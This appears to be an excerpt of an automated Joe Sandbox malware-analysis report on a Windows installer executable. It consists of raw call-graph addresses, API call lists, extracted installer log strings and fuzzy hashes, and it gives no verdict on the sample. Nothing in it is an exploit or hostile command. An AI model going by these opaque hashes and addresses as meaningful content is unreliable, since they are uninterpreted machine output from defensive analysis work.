40af32 56527->56528 56537 40ae44 19 API calls 56527->56537 56530 41101c 56528->56530 56531 41103e 56530->56531 56532 406df4 5 API calls 56531->56532 56533 403450 4 API calls 56531->56533 56534 41105d 56531->56534 56532->56531 56533->56531 56535 403400 4 API calls 56534->56535 56536 411072 56535->56536 56536->56265 56537->56527 56539 41deae 56538->56539 56539->56268 56556 4078c8 56540->56556 57815 42f530 57816 42f53b 57815->57816 57817 42f53f NtdllDefWindowProc_A 57815->57817 57817->57816 55808 416b52 55809 416bfa 55808->55809 55810 416b6a 55808->55810 55827 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55809->55827 55812 416b84 SendMessageA 55810->55812 55813 416b78 55810->55813 55823 416bd8 55812->55823 55814 416b82 CallWindowProcA 55813->55814 55815 416b9e 55813->55815 55814->55823 55824 41a068 GetSysColor 55815->55824 55818 416ba9 SetTextColor 55819 416bbe 55818->55819 55825 41a068 GetSysColor 55819->55825 55821 416bc3 
SetBkColor 55826 41a6f0 GetSysColor CreateBrushIndirect 55821->55826 55824->55818 55825->55821 55826->55823 55827->55823 57818 4358f0 57819 435905 57818->57819 57823 43591f 57819->57823 57824 4352d8 57819->57824 57828 435322 57824->57828 57829 435308 57824->57829 57825 403400 4 API calls 57826 435727 57825->57826 57826->57823 57837 435738 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57826->57837 57827 446db4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57827->57829 57828->57825 57829->57827 57829->57828 57830 402648 4 API calls 57829->57830 57831 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57831 57833 431cb0 4 API calls 57829->57833 57834 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57834 57835 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57835 57838 4343c0 57829->57838 57850 434b84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57850 57830->57829 57831->57829 57833->57829 57834->57829 57835->57829 57837->57823 57839 43447d 57838->57839 57840 4343ed 57838->57840 57869 434320 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57839->57869 57841 403494 4 API calls 57840->57841 57843 4343fb 57841->57843 57844 403778 4 API calls 57843->57844 57848 43441c 57844->57848 57845 403400 4 API calls 57846 4344cd 57845->57846 57846->57829 57847 43446f 57847->57845 57848->57847 57851 494314 57848->57851 57850->57829 57852 49434c 57851->57852 57853 4943e4 57851->57853 57854 403494 4 API calls 57852->57854 57870 448940 57853->57870 57859 494357 57854->57859 57856 494367 57857 403400 4 API calls 57856->57857 57858 494408 57857->57858 57860 403400 4 API calls 57858->57860 57859->57856 57861 4037b8 4 API calls 57859->57861 57862 494410 57860->57862 57863 494380 57861->57863 57862->57848 57863->57856 57864 4037b8 4 API calls 57863->57864 57865 4943a3 57864->57865 57866 403778 4 API calls 57865->57866 57867 4943d4 57866->57867 57868 403634 4 API calls 57867->57868 57868->57853 57869->57847 57871 448965 57870->57871 57881 4489a8 
57870->57881 57872 403494 4 API calls 57871->57872 57874 448970 57872->57874 57877 4037b8 4 API calls 57874->57877 57875 4489bc 57876 403400 4 API calls 57875->57876 57878 4489ef 57876->57878 57879 44898c 57877->57879 57878->57856 57880 4037b8 4 API calls 57879->57880 57880->57881 57881->57875 57882 44853c 57881->57882 57883 403494 4 API calls 57882->57883 57884 448572 57883->57884 57885 4037b8 4 API calls 57884->57885 57886 448584 57885->57886 57887 403778 4 API calls 57886->57887 57888 4485a5 57887->57888 57889 4037b8 4 API calls 57888->57889 57890 4485bd 57889->57890 57891 403778 4 API calls 57890->57891 57892 4485e8 57891->57892 57893 4037b8 4 API calls 57892->57893 57895 448600 57893->57895 57894 4486d3 57899 4486db GetProcAddress 57894->57899 57895->57894 57897 44865b LoadLibraryExA 57895->57897 57898 44866d LoadLibraryA 57895->57898 57902 448638 57895->57902 57903 403b80 4 API calls 57895->57903 57904 403450 4 API calls 57895->57904 57906 43da98 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57895->57906 57896 403420 4 API calls 57900 448718 57896->57900 57897->57895 57898->57895 57901 4486ee 57899->57901 57900->57875 57901->57902 57902->57896 57903->57895 57904->57895 57906->57895 57907 40ce34 57910 406f18 WriteFile 57907->57910 57911 406f35 57910->57911 55828 416654 55829 416661 55828->55829 55830 4166bb 55828->55830 55836 416560 CreateWindowExA 55829->55836 55837 4162da 55829->55837 55831 416668 SetPropA SetPropA 55831->55830 55832 41669b 55831->55832 55833 4166ae SetWindowPos 55832->55833 55833->55830 55836->55831 55838 416306 55837->55838 55839 4162e6 GetClassInfoA 55837->55839 55838->55831 55839->55838 55840 4162fa GetClassInfoA 55839->55840 55840->55838 57912 4222f4 57913 422303 57912->57913 57918 421284 57913->57918 57916 422323 57919 4212f3 57918->57919 57933 421293 57918->57933 57922 421304 57919->57922 57943 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 57919->57943 57921 421332 57925 4213a5 57921->57925 57930 42134d 57921->57930 
57922->57921 57924 4213ca 57922->57924 57923 4213a3 57926 4213f6 57923->57926 57945 421e3c 11 API calls 57923->57945 57924->57923 57928 4213de SetMenu 57924->57928 57925->57923 57932 4213b9 57925->57932 57946 4211cc 10 API calls 57926->57946 57928->57923 57930->57923 57936 421370 GetMenu 57930->57936 57931 4213fd 57931->57916 57941 4221f8 10 API calls 57931->57941 57935 4213c2 SetMenu 57932->57935 57933->57919 57942 408d34 19 API calls 57933->57942 57935->57923 57937 421393 57936->57937 57938 42137a 57936->57938 57944 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 57937->57944 57940 42138d SetMenu 57938->57940 57940->57937 57941->57916 57942->57933 57943->57922 57944->57923 57945->57926 57946->57931 57947 44b4b8 57948 44b4c6 57947->57948 57950 44b4e5 57947->57950 57949 44b39c 11 API calls 57948->57949 57948->57950 57949->57950 57951 448738 57952 448766 57951->57952 57953 44876d 57951->57953 57955 403400 4 API calls 57952->57955 57954 448781 57953->57954 57956 44853c 7 API calls 57953->57956 57954->57952 57957 403494 4 API calls 57954->57957 57959 448917 57955->57959 57956->57954 57958 44879a 57957->57958 57960 4037b8 4 API calls 57958->57960 57961 4487b6 57960->57961 57962 4037b8 4 API calls 57961->57962 57963 4487d2 57962->57963 57963->57952 57964 4487e6 57963->57964 57965 4037b8 4 API calls 57964->57965 57966 448800 57965->57966 57967 431be0 4 API calls 57966->57967 57968 448822 57967->57968 57969 431cb0 4 API calls 57968->57969 57974 448842 57968->57974 57969->57968 57970 448898 57983 442344 57970->57983 57972 448880 57972->57970 57995 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57972->57995 57974->57972 57994 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57974->57994 57976 4488cc GetLastError 57996 4484d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57976->57996 57978 4488db 57997 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57978->57997 57980 4488f0 57998 443630 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57980->57998 57982 
4488f8 57984 443322 57983->57984 57985 44237d 57983->57985 57987 403400 4 API calls 57984->57987 57986 403400 4 API calls 57985->57986 57988 442385 57986->57988 57989 443337 57987->57989 57990 431be0 4 API calls 57988->57990 57989->57976 57991 442391 57990->57991 57992 443312 57991->57992 57999 441a1c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57991->57999 57992->57976 57994->57974 57995->57970 57996->57978 57997->57980 57998->57982 57999->57991 58000 4165fc 73EA5CF0 58001 42e3ff SetErrorMode
                                                                                Strings
                                                                                • Version of our file: %u.%u.%u.%u, xrefs: 00470D98
                                                                                • Time stamp of existing file: %s, xrefs: 00470CD3
                                                                                • Time stamp of existing file: (failed to read), xrefs: 00470CDF
                                                                                • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470F78
                                                                                • InUn, xrefs: 004713ED
                                                                                • Time stamp of our file: %s, xrefs: 00470C43
                                                                                • Dest filename: %s, xrefs: 00470B3C
                                                                                • Time stamp of our file: (failed to read), xrefs: 00470C4F
                                                                                • Skipping due to "onlyifdestfileexists" flag., xrefs: 004711A2
                                                                                • Incrementing shared file count (64-bit)., xrefs: 0047181A
                                                                                • Existing file has a later time stamp. Skipping., xrefs: 00471077
                                                                                • Failed to strip read-only attribute., xrefs: 0047117B
                                                                                • Uninstaller requires administrator: %s, xrefs: 0047141D
                                                                                • Will register the file (a type library) later., xrefs: 004717A1
                                                                                • -- File entry --, xrefs: 004709A3
                                                                                • Dest file exists., xrefs: 00470C63
                                                                                • Existing file is a newer version. Skipping., xrefs: 00470EAA
                                                                                • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470F6C
                                                                                • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470F5D
                                                                                • Couldn't read time stamp. Skipping., xrefs: 00470FDD
                                                                                • Non-default bitness: 32-bit, xrefs: 00470B63
                                                                                • Version of existing file: (none), xrefs: 00470FA2
                                                                                • User opted not to overwrite the existing file. Skipping., xrefs: 004710F5
                                                                                • Same version. Skipping., xrefs: 00470F8D
                                                                                • Non-default bitness: 64-bit, xrefs: 00470B57
                                                                                • Version of existing file: %u.%u.%u.%u, xrefs: 00470E24
                                                                                • Installing into GAC, xrefs: 004719A2
                                                                                • Skipping due to "onlyifdoesntexist" flag., xrefs: 00470C76
                                                                                • Stripped read-only attribute., xrefs: 0047116F
                                                                                • Dest file is protected by Windows File Protection., xrefs: 00470B95
                                                                                • Version of our file: (none), xrefs: 00470DA4
                                                                                • Will register the file (a DLL/OCX) later., xrefs: 004717AD
                                                                                • , xrefs: 00470E77, 00471048, 004710C6
                                                                                • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047113E
                                                                                • Existing file is protected by Windows File Protection. Skipping., xrefs: 00471094
                                                                                • Same time stamp. Skipping., xrefs: 00470FFD
                                                                                • @, xrefs: 00470A58
                                                                                • Installing the file., xrefs: 004711B1
                                                                                • .tmp, xrefs: 0047125F
                                                                                • Incrementing shared file count (32-bit)., xrefs: 00471833
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                • API String ID: 0-4021121268
                                                                                • Opcode ID: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                                • Instruction ID: 00dcbbebc37e67597ddb11db3b00c056d98a3663d13b65a1c96947d1bb872b77
                                                                                • Opcode Fuzzy Hash: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                                • Instruction Fuzzy Hash: 2C927534A04288DFDB11DFA9C845BDDBBB5AF05304F5480ABE848AB392C7789E45CB59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                                                • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                                                • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                                                • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                • API String ID: 2252812187-1888249752
                                                                                • Opcode ID: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                                • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                                                • Opcode Fuzzy Hash: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                                                • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1610 4502ac-4502b9 1611 4502bf-4502cc GetVersion 1610->1611 1612 450368-450372 1610->1612 1611->1612 1613 4502d2-4502e8 LoadLibraryA 1611->1613 1613->1612 1614 4502ea-450363 GetProcAddress * 6 1613->1614 1614->1612
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmStartSession), ref: 004502F5
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmRegisterResources), ref: 0045030A
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmGetList), ref: 0045031F
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmShutdown), ref: 00450334
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmRestart), ref: 00450349
                                                                                • GetProcAddress.KERNEL32(6E7A0000,RmEndSession), ref: 0045035E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadVersion
                                                                                • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                • API String ID: 1968650500-3419246398
                                                                                • Opcode ID: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                                • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                                                • Opcode Fuzzy Hash: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                                                • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                                • Instruction ID: adb1057a9d0d7329e5210459a6b6756db00cf693e958207d3a560887342e2c6b
                                                                                • Opcode Fuzzy Hash: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                                                • Instruction Fuzzy Hash: EBE1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE81DB08

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                APIs
                                                                                  • Part of subcall function 0049529C: GetWindowRect.USER32(00000000), ref: 004952B2
                                                                                • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467ADF
                                                                                  • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467AF9), ref: 0041D6EB
                                                                                  • Part of subcall function 004674EC: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                  • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                  • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                  • Part of subcall function 00466EAC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                                  • Part of subcall function 00495520: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0049552A
                                                                                  • Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                  • Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                  • Part of subcall function 004951EC: 73E9A570.USER32(00000000,?,?,?), ref: 0049520E
                                                                                  • Part of subcall function 004951EC: SelectObject.GDI32(?,00000000), ref: 00495234
                                                                                  • Part of subcall function 004951EC: 73E9A480.USER32(00000000,?,00495292,0049528B,?,00000000,?,?,?), ref: 00495285
                                                                                  • Part of subcall function 00495510: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0049551A
                                                                                • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02169D90,0216B97C,?,?,0216B9AC,?,?,0216B9FC,?), ref: 00468769
                                                                                • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046877A
                                                                                • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468792
                                                                                  • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                • String ID: $(Default)$STOPIMAGE$k H
                                                                                • API String ID: 3271511185-4041106330
                                                                                • Opcode ID: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                                • Instruction ID: 2b4e5e33b1fbe28ecfb2af168a793b611adbc31a6fcb8730d9662ddd01b2079a
                                                                                • Opcode Fuzzy Hash: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                                                • Instruction Fuzzy Hash: 6CF2C7386005208FCB00EB59D9D9F9973F5BF49304F1582BAF5049B36ADB74AC46CB9A
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                                                • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID: unins$unins???.*
                                                                                • API String ID: 3541575487-1009660736
                                                                                • Opcode ID: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                                • Instruction ID: 9ba6e551af2be01ae54f2bf6d4feb37662207b66b60327addd096aea054bc42d
                                                                                • Opcode Fuzzy Hash: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                                                • Instruction Fuzzy Hash: 333153706005489FDB10EB65D981ADE77B9EF44344F5080F6A80CAB3B2DBB89F418B58
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileFindFirstLast
                                                                                • String ID:
                                                                                • API String ID: 873889042-0
                                                                                • Opcode ID: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                                • Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
                                                                                • Opcode Fuzzy Hash: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                                                • Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,0046E422), ref: 0046E396
                                                                                • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E422), ref: 0046E3B2
                                                                                Similarity
                                                                                • API ID: CreateInstanceVersion
                                                                                • String ID:
                                                                                • API String ID: 1462612201-0
                                                                                • Opcode ID: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                                • Instruction ID: ca204bcfc643a6eeda20b237376823326e775e7ff9cf44b6f5c5a065e078b710
                                                                                • Opcode Fuzzy Hash: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                                                • Instruction Fuzzy Hash: 80F0A035282200DEEB1097AADC45B4A37C1BB20718F40007BF440D7391E3FDD8908A5F
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                                • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                                • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                • Instruction ID: 445fb77b721d6e8bc33303137c5d79e403f1e24c04085a252f4bbff9531eb306
                                                                                • Opcode Fuzzy Hash: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                • Instruction Fuzzy Hash: 6AD0C271304704A3C700AAA99C825AA35DD8B84315F00483F3CC6DA3C3FABDDA481696
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F54C
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
